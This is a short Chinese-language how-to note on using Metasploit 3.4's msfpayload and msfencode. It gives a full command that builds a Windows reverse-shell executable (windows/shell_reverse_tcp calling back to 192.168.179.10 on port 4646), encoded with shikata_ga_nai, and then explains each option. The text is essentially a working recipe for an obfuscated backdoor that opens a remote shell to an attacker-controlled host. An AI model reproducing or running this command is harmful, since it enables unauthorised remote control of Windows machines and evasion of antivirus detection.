利用Metasploit 3.4提供的msfpayload和msfencode可以生成编码后的exe文件
#msfpayload windows/shell_reverse_tcp LHOST=192.168.179.10 LPORT=4646 r | msfencode -e x86/shikata_ga_nai -t exe -o /home/tangbohu/rtcp.exe
windows/shell_reverse_tcp 就是我们自己需要的payload;
LHOST=192.168.179.10 LPORT=4646 是上面payload需要的选项,LHOST表示反向链接到的主机的IP,LPORT表示反向链接到的主机的端口;
r 表示生成raw代码;
-e x86/shikata_ga_nai 指定需要的encoder;
-t exe 表示生成的是windows下的可执行文件;
-o /home/tangbohu/rtcp.exe 指定生成的exe文件保存在哪里。
|
|